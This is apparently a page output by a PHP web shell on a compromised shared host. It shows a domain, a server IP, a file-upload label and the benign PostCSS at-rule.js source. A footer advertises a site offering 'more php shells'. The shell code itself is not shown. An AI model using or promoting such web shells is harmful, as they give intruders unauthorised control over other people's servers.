Domain: amberpublishers.in
Server Adress: 86.38.243.169

privdayz.com

/home/u866425823/domains/tejassolar.co.in/node_modules/postcss/lib/
Dosya Yükle :
Current File : /home/u866425823/domains/tejassolar.co.in/node_modules/postcss/lib/at-rule.js

'use strict'

let Container = require('./container')

class AtRule extends Container {
  constructor(defaults) {
    super(defaults)
    this.type = 'atrule'
  }

  append(...children) {
    if (!this.proxyOf.nodes) this.nodes = []
    return super.append(...children)
  }

  prepend(...children) {
    if (!this.proxyOf.nodes) this.nodes = []
    return super.prepend(...children)
  }
}

module.exports = AtRule
AtRule.default = AtRule

Container.registerAtRule(AtRule)

coded by Privdayz.com - Visit https://privdayz.com/ for more php shells.